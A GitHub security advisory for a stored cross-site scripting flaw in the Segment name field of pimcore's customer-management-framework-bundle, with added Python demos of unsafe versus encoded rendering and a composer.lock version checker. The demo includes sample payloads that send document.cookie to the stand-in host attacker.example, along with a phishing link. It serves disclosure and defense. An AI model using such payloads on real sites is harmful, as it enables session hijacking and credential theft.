GHSA-735f-w79p-282x: pimcore/customer-management-framework-bundle Cross-site Scripting vulnerability in Segment name
Impact
The Segment name field is stored and later rendered without proper output encoding (CWE-79; alternate XSS syntax is not neutralized either, CWE-87), so HTML or script placed in a segment name is executed in the browser of any user who views it. The advisory notes that the HTML injection also works in email. An attacker can use this to plant hyperlinks that redirect a victim to a malicious site, host an XSS payload that runs in the victim's session, or present a fake login form to harvest credentials.
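To make the CWE-79/CWE-87 point concrete, the following added example (written for this page, not code from Pimcore or the huntr report) renders a segment name three ways: unescaped (the vulnerable pattern), through a naive blocklist that only strips literal `<script>` tags, and with proper HTML entity encoding. The segment names, the `segment-name` cell markup and the `attacker.example` host are all constructed for the demonstration; the "filtered" variant exists only to show why pattern filtering is not a fix.

```python
import html
import re

# Constructed sample segment names an attacker could submit. These are
# illustrative payloads for this example, not taken from the advisory.
SEGMENT_NAMES = {
    "benign": "Newsletter subscribers & VIPs",
    # Plain hyperlink used for phishing / redirection (no script needed)
    "phishing_link": '<a href="https://attacker.example/login">Session expired, sign in again</a>',
    # Classic script tag
    "script": "<script>document.location='https://attacker.example/?c='+document.cookie</script>",
    # Alternate XSS syntax (CWE-87): event handler instead of a <script> tag
    "img_onerror": '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
    # Mixed case defeats a case-sensitive pattern filter
    "mixed_case": "<ScRiPt>alert(1)</sCrIpT>",
}

# Hypothetical wrapper markup standing in for the table cell the name is shown in
WRAPPER_OPEN = '<td class="segment-name">'
WRAPPER_CLOSE = "</td>"


def render_vulnerable(name: str) -> str:
    """Interpolates the stored name into HTML with no output encoding."""
    return f"{WRAPPER_OPEN}{name}{WRAPPER_CLOSE}"


def render_filtered(name: str) -> str:
    """Naive blocklist: removes literal <script> tags and nothing else.
    Event handlers, hyperlinks and mixed-case tags pass straight through."""
    cleaned = re.sub(r"</?script>", "", name)
    return f"{WRAPPER_OPEN}{cleaned}{WRAPPER_CLOSE}"


def render_safe(name: str) -> str:
    """HTML entity encoding for an element-content context: every '<', '>',
    '&' and quote becomes an entity, so injected markup is shown as text."""
    return f"{WRAPPER_OPEN}{html.escape(name, quote=True)}{WRAPPER_CLOSE}"


def injected_markup(rendered: str) -> bool:
    """True if the content inside the wrapper still contains a raw HTML tag
    start (a '<' followed by an optional '/' and a tag name)."""
    inner = rendered.removeprefix(WRAPPER_OPEN).removesuffix(WRAPPER_CLOSE)
    return re.search(r"<\s*/?\s*\w", inner) is not None


def evaluate() -> dict:
    """Returns, per sample name, whether each renderer leaves injected markup."""
    results = {}
    for label, name in SEGMENT_NAMES.items():
        results[label] = {
            "vulnerable": injected_markup(render_vulnerable(name)),
            "filtered": injected_markup(render_filtered(name)),
            "safe": injected_markup(render_safe(name)),
        }
    return results


if __name__ == "__main__":
    for label, outcome in evaluate().items():
        print(f"{label:14s} {outcome}")
```

The blocklist variant neutralizes only the literal `<script>` payload; the phishing link, the `onerror` handler and the mixed-case tag all survive it, which is exactly the alternate-syntax failure CWE-87 describes. Entity encoding at output time neutralizes every sample.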
Patches
Update to version 3.4.2 or apply this patch manually: https://github.com/pimcore/customer-data-framework/commit/72f45dd537a706954e7a71c99fbe318640e846a2.patch
Workarounds
Apply https://github.com/pimcore/customer-data-framework/commit/72f45dd537a706954e7a71c99fbe318640e846a2.patch manually.
References
https://huntr.dev/bounties/ce852777-2994-40b4-bb4e-c4d10023eeb0/
Moderate severity GitHub Reviewed Published Aug 3, 2023 in pimcore/customer-data-framework
Vulnerability details
Package
composer pimcore/customer-management-framework-bundle (Composer)
Affected versions
< 3.4.2
Patched versions
3.4.2
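Because the advisory gives a plain version boundary (affected < 3.4.2, patched 3.4.2), the quickest inventory check is against `composer.lock`. The following added example (written for this page, not Pimcore tooling or a GitHub feature) parses a lock file and reports installed copies of the bundle below the fixed version; the three lock fragments are constructed samples, and `AFFECTED` carries only the one entry this advisory supports.

```python
import json
import re

# Constructed composer.lock fragments (not from any real project)
SAMPLE_LOCK_VULNERABLE = json.dumps({
    "packages": [
        {"name": "pimcore/pimcore", "version": "v10.5.21"},
        {"name": "pimcore/customer-management-framework-bundle", "version": "v3.4.1"},
    ],
    "packages-dev": [],
})
SAMPLE_LOCK_PATCHED = json.dumps({
    "packages": [
        {"name": "pimcore/customer-management-framework-bundle", "version": "v3.4.2"},
    ],
    "packages-dev": [],
})
SAMPLE_LOCK_BRANCH = json.dumps({
    "packages": [
        {"name": "pimcore/customer-management-framework-bundle", "version": "dev-main"},
    ],
    "packages-dev": [],
})

# Advisory data as stated on this page
AFFECTED = {
    "pimcore/customer-management-framework-bundle": {
        "advisory": "GHSA-735f-w79p-282x / CVE-2023-4145",
        "fixed_in": "3.4.2",
    },
}

_VERSION = re.compile(r"[vV]?(\d+(?:\.\d+)*)(?:-([0-9A-Za-z.]+))?(?:\+[0-9A-Za-z.]+)?")


def parse_version(v: str) -> tuple:
    """Turns 'v3.4.1', '3.4.2-RC1' or '3.4.2+build' into a comparable tuple.
    A pre-release sorts before the final release; build metadata is ignored.
    Branch aliases such as 'dev-main' raise ValueError."""
    m = _VERSION.fullmatch(v.strip())
    if not m:
        raise ValueError(f"unsupported version string: {v!r}")
    numbers = [int(x) for x in m.group(1).split(".")]
    numbers += [0] * (3 - len(numbers))
    return tuple(numbers) + ((0,) if m.group(2) else (1,))


def find_vulnerable(lock_json: str) -> list:
    """Returns one finding per installed package that is below its fixed
    version, or that cannot be compared and needs manual review."""
    lock = json.loads(lock_json)
    findings = []
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            info = AFFECTED.get(pkg.get("name"))
            if info is None:
                continue
            try:
                vulnerable = parse_version(pkg["version"]) < parse_version(info["fixed_in"])
            except ValueError:
                vulnerable = None  # e.g. dev-main: version unknown, review the commit
            if vulnerable is False:
                continue
            findings.append({
                "name": pkg["name"],
                "version": pkg["version"],
                "fixed_in": info["fixed_in"],
                "advisory": info["advisory"],
                "status": "vulnerable" if vulnerable else "manual-review",
            })
    return findings


if __name__ == "__main__":
    for label, lock in (("vulnerable", SAMPLE_LOCK_VULNERABLE),
                        ("patched", SAMPLE_LOCK_PATCHED),
                        ("branch", SAMPLE_LOCK_BRANCH)):
        print(label, find_vulnerable(lock))
```

A `dev-*` branch alias is reported for manual review rather than silently passed, since whether it contains commit 72f45dd cannot be decided from the version string alone.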
References
- GHSA-735f-w79p-282x
- pimcore/customer-data-framework@72f45dd
- https://github.com/pimcore/customer-data-framework/commit/72f45dd537a706954e7a71c99fbe318640e846a2.patch
- https://huntr.dev/bounties/ce852777-2994-40b4-bb4e-c4d10023eeb0/
dvesh3 published to pimcore/customer-data-framework
Aug 3, 2023
Published to the GitHub Advisory Database
Aug 3, 2023
Reviewed
Aug 3, 2023
Severity
Moderate
Weaknesses
CWE-79 CWE-87
CVE ID
CVE-2023-4145
GHSA ID
GHSA-735f-w79p-282x
Source code
pimcore/customer-data-framework
Related news
Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/customer-data-framework prior to 3.4.2.